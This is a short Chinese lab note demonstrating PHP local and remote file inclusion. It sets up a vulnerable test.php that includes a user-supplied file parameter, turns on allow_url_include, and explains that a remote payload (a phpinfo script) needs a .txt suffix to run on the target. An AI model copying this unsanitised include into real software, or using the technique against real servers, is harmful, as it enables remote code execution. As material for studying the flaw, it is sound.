在本地搭建test.php
<?php
if( !ini_get('display_errors') ) {
ini_set('display_errors', 'On');
}
error_reporting(E_ALL);
$f = $_GET["file"];
if ($f){
//require "".$f.".php";
include "".$f;
}else{
print("No File Included");
}
?>
---------------------------------
http://xxx.com/test.php?file=123 本地的成功
http://xxx.com/test.php?file=http://xxx.com/123 远程的不成功
---------------------------------
打开php.ini文件的:
allow_url_fopen = On
allow_url_include = On
---------------------------------
http://xxx.com/test.php?file=http://xxx.com/123 远程的成功
-----------------------------------------------------------------------------------------------------------------------------------------------------------
注:在使用远程文件包含时,攻击代码必需为.txt后缀
如远程空间为:
phpinfo.php --->包含后的信息为远程服务器的phpinfo信息
phpinfo.txt --->包含后才是漏洞服务器的phpinfo信息
内容同为:
<?php
phpinfo();
?>